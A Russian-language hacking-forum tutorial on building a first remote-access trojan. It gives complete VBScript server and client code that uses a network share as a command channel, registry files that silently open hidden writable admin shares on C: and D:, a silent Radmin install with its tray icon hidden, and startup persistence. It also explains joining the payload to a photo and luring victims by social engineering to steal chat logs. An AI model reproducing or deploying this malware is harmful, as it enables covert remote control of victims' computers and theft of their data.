мой первый троян
это моя первая статья про мой первый троян, нашел его недавно, возможно комуто пригодится, так как зделать его сможет даже человек ничего в этом не смыслящий.
Для написания нам понадобится блокнот, r_admin, Joiner, Win Rar, WhoIsConnected
И так в исходниках троян будет представлять из себя несколько файлов:
server.vbs
klient.vbs
D.bat
D.reg
r.bat
r.reg
test.vbs
r.exe
raddrv.dll
admDll.dll
Ну я начну с описания каждого файла по порядку
server.vbs (полностью каждую строку я описывать не буду, кому надо думаю сами разберутся..)
это именно сам файл сервера
Код:
on error resume next
on error resume next
do
set WshShell = WScript.CreateObject("WScript.Shell")
Set FileSystemObject = CreateObject("scripting.filesystemobject")
set fs=createobject("Scripting.FileSystemObject")'FileSystem
if fs.fileexists("\\127.0.0.1\ПАПКА\1") then
set mplayer=CreateObject("WMPlayer.OCX.7")
mplayer.cdromcollection.item(count).eject()
FileSystemObject.DeleteFile "\\127.0.0.1\ПАПКА\1" , True
end if
" в качестве \\127.0.0.1\ПАПКА\ была папка открытая у меня на доступе в которой если я создам файл с именем "1" без расширения то открывается лоток СД на заражонном компе
if fs.fileexists("\\127.0.0.1\ПАПКА\2.vbs") then
set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "\\127.0.0.1\ПАПКА\2.vbs"
"если существует файл 2.vbs у меня на доступе то он запускается
Wscript.sleep(30000)
FileSystemObject.DeleteFile "\\127.0.0.1\ПАПКА\2.vbs" , True
end if
"и удаляем 2.vbs
if fs.Folderexists("\\127.0.0.1\ПАПКА\4") then
Set aa= FileSystemObject.GetFolder("\\127.0.0.1\ПАПКА\4")
aa.copy("C:\Windows\")
aa.delete
end if
"тут если папка с именем "4" существует то все ее содержимое копируется на C:\Windows\ удаленного компа
if fs.fileexists("\\127.0.0.1\ПАПКА\5") then
Set Shell = CreateObject("WScript.Shell")
Shell.run "D.bat",0,1
Set Shell= Nothing
FileSystemObject.DeleteFile "\\127.0.0.1\ПАПКА\5" , True
"Если существует файл "5" тогда на удаленном компе запускается файл D.bat (его содержимое будет описано далее)
end if
if fs.fileexists("\\127.0.0.1\ПАПКА\6") then
Set Shell = CreateObject("WScript.Shell")
Shell.run "r.bat",0,1
Set Shell= Nothing
FileSystemObject.DeleteFile "\\127.0.0.1\ПАПКА\6" , True
"если существует "6" запускается r.bat
end if
if fs.fileexists("\\127.0.0.1\ПАПКА\3") then
FileSystemObject.DeleteFile "\\127.0.0.1\ПАПКА\3" , True
Wscript.sleep(30000)
dim OpSysSet, obj
Set OpSysSet = GetObject("winmgmts:{impersonationLevel=impersonate," & _
"(Shutdown)}//./root/cimv2").ExecQuery _
("SELECT * FROM Win32_OperatingSystem" &_
" WHERE Primary=true")
For Each obj In OpSysSet
obj.Win32Shutdown(8)
Next
end if
"в этом куске, если у меня на доступе есть файл 3 то компьютер жертвы выключается
loop
klient.vbs ''это сбствено файл клиента, который и буде создавать в указаной папке те самые файлы на которые реагирует сервер
Код:
Set FileSystemObject = CreateObject("scripting.filesystemobject")
FileName = InputBox("-Для открытия лотка CD- введите 1 -Для отправки сообщения -введите 2 -Для выключения компьютера-введите 3 -Для копирования файлов на компьютер-введите 4 -Для открытия доступа к дискам С и D - введите 5.Сработает после перезагрузки -Для установки Р_Админа нажмите 6. Пароль pass port = 7777 ")
if Filename = 1then
FileSystemObject.CreateTextFile "\\192.168.3.159\Svalka\1"
end if
if Filename = 2 then
sms = InputBox("введите текст сообщения в кавычках, например: ""привет вася"" обязательно только так!!! ")
Set sss = FileSystemObject.OpenTextFile("\\192.168.3.159\Svalka\2.vbs", 8, True)
sss.WriteLine ("msgbox " & sms)
sss.close
end if
if Filename = 3 then
FileSystemObject.CreateTextFile "\\192.168.3.159\Svalka\3"
end if
if Filename = 4 then
FileSystemObject.CreateFolder "\\192.168.3.159\Svalka\4"
file = InputBox(" Введите путь к папке с файлами, фалы скопируются в папку C:\Windows")
Set aa= FileSystemObject.GetFolder("" & file)
aa.copy("\\192.168.3.159\Svalka\4")
end if
if Filename = 5 then
FileSystemObject.CreateTextFile "\\192.168.3.159\Svalka\5"
end if
if Filename = 6 then
FileSystemObject.CreateTextFile "\\192.168.3.159\Svalka\6"
end if
if Filename = 7 then
FileSystemObject.CreateTextFile "\\192.168.3.159\Svalka\7"
end if
с этим я думаю и так все ясно, описывать здесь я думаю нечего
D.bat
этот файл добавляет в реестр значение из файла D.reg без запроса "Вы действительно хотите добавить даныые в реестр?"
Код:
@ECHO OFF
regedit /i /s D.reg
D.reg
этот файл открывает доступ с правами записи/удаления на диски С:\\ и D:\\ в таком режиме что их не будет видно если вы просто зайдете на адресс локального компа, адресс нужно будет воодить как 192.168.1.1\1$ или же 192.168.1.1\2$ для диска Ц и Д
его содержимое:
Код:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\lanmanserver\Shares]
"1$"=hex(7):43,00,53,00,43,00,46,00,6c,00,61,00,67,00,73,00,3d,00,30,00,00,00,\
4d,00,61,00,78,00,55,00,73,00,65,00,73,00,3d,00,34,00,32,00,39,00,34,00,39,\
00,36,00,37,00,32,00,39,00,35,00,00,00,50,00,61,00,74,00,68,00,3d,00,43,00,\
3a,00,5c,00,00,00,50,00,65,00,72,00,6d,00,69,00,73,00,73,00,69,00,6f,00,6e,\
00,73,00,3d,00,30,00,00,00,52,00,65,00,6d,00,61,00,72,00,6b,00,3d,00,00,00,\
54,00,79,00,70,00,65,00,3d,00,30,00,00,00,00,00
"2$"=hex(7):43,00,53,00,43,00,46,00,6c,00,61,00,67,00,73,00,3d,00,30,00,00,00,\
4d,00,61,00,78,00,55,00,73,00,65,00,73,00,3d,00,34,00,32,00,39,00,34,00,39,\
00,36,00,37,00,32,00,39,00,35,00,00,00,50,00,61,00,74,00,68,00,3d,00,44,00,\
3a,00,5c,00,00,00,50,00,65,00,72,00,6d,00,69,00,73,00,73,00,69,00,6f,00,6e,\
00,73,00,3d,00,30,00,00,00,52,00,65,00,6d,00,61,00,72,00,6b,00,3d,00,00,00,\
54,00,79,00,70,00,65,00,3d,00,30,00,00,00,00,00
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\lanmanserver\Shares\Security]
"1$"=hex:01,00,04,80,30,00,00,00,4c,00,00,00,00,00,00,00,14,00,00,00,02,00,1c,\
00,01,00,00,00,00,00,14,00,bf,01,13,00,01,01,00,00,00,00,00,01,00,00,00,00,\
01,05,00,00,00,00,00,05,15,00,00,00,6b,d6,62,04,eb,25,79,2c,43,17,0a,32,eb,\
03,00,00,01,05,00,00,00,00,00,05,15,00,00,00,6b,d6,62,04,eb,25,79,2c,43,17,\
0a,32,01,02,00,00
"2$"=hex:01,00,04,80,30,00,00,00,4c,00,00,00,00,00,00,00,14,00,00,00,02,00,1c,\
00,01,00,00,00,00,00,14,00,bf,01,13,00,01,01,00,00,00,00,00,01,00,00,00,00,\
01,05,00,00,00,00,00,05,15,00,00,00,6b,d6,62,04,eb,25,79,2c,43,17,0a,32,eb,\
03,00,00,01,05,00,00,00,00,00,05,15,00,00,00,6b,d6,62,04,eb,25,79,2c,43,17,\
0a,32,01,02,00,00
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\lanmanserver\Shares\Security]
"1$"=hex:01,00,04,80,30,00,00,00,4c,00,00,00,00,00,00,00,14,00,00,00,02,00,1c,\
00,01,00,00,00,00,00,14,00,bf,01,13,00,01,01,00,00,00,00,00,01,00,00,00,00,\
01,05,00,00,00,00,00,05,15,00,00,00,6b,d6,62,04,eb,25,79,2c,43,17,0a,32,eb,\
03,00,00,01,05,00,00,00,00,00,05,15,00,00,00,6b,d6,62,04,eb,25,79,2c,43,17,\
0a,32,01,02,00,00
"2$"=hex:01,00,04,80,30,00,00,00,4c,00,00,00,00,00,00,00,14,00,00,00,02,00,1c,\
00,01,00,00,00,00,00,14,00,bf,01,13,00,01,01,00,00,00,00,00,01,00,00,00,00,\
01,05,00,00,00,00,00,05,15,00,00,00,6b,d6,62,04,eb,25,79,2c,43,17,0a,32,eb,\
03,00,00,01,05,00,00,00,00,00,05,15,00,00,00,6b,d6,62,04,eb,25,79,2c,43,17,\
0a,32,01,02,00,00
r.bat файл для установки и Р_Адммина, c паролем pass на порт 7777, и записи в реестр данных из r.reg
Код:
@ECHO OFF
regedit /i /s r.reg
start r.exe /install /pass:pass /port:7777 /save /silence
start r.exe
r.reg собственно чтобы наш радмин не палился в трее,и его удаленная установка с правельными параметрами
Код:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin]
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0]
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server]
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\iplist]
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters]
"Port"=hex:79,1d,00,00
"Timeout"=hex:0a,00,00,00
"EnableLogFile"=hex:00,00,00,00
"LogFilePath"=""
"FilterIp"=hex:00,00,00,00
"DisableTrayIcon"=hex:01,00,00,00
"AutoAllow"=hex:00,00,00,00
"AskUser"=hex:00,00,00,00
"EnableEventLog"=hex:00,00,00,00
"NTAuthEnabled"=hex:00,00,00,00
"Parameter"=hex:e4,4e,f0,f4,df,c9,4a,2f,d5,3d,24,a3,a1,ee,2b,69
test.vbs добавляет файл нашего сервера в автозагрузку
Код:
set WshShell = CreateObject("WScript.Shell")
WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\test", "C:\Windows\system32\server.vbs"
r.exe
raddrv.dll
admDll.dll файлы самого р_админа
все эти файлы собираются в самоизвлекающийся архив, сформированый таким образом что файлы распаковываются в C:\Windows\system32 а в автозагрузке создается ярлык для test.vbs .
с помощью программы WhoIsConnected мы смотрим кто лезет к нам на шару, и там будет список наших зараженных айпишников, так как файл сервера бесконечно сканирует
нашу общедоступную папку на которую у нас открыт доступ и ищет там файлы которые в нем прописаны, как только сервер находит у нас файл с определенным именем то он начинает выполнять действия которые соответствуют имени найденого файла. При желании к этому "трояну" можно дописать есче очень много опций но это была моя первая "полезная" программа которую я задумывал для воровства логов с чата :), Созданый самораспаковывающийся архив склеивался с какойнибудь фоткой, или флешкой и выкидывался на шару, или же жертве с помощью СИ, для начала знакомился потом обменивались фотками, но у меня была не простая фотка :)вообщем методов впарить много, была бы фантазия
(c) spam for antichat |
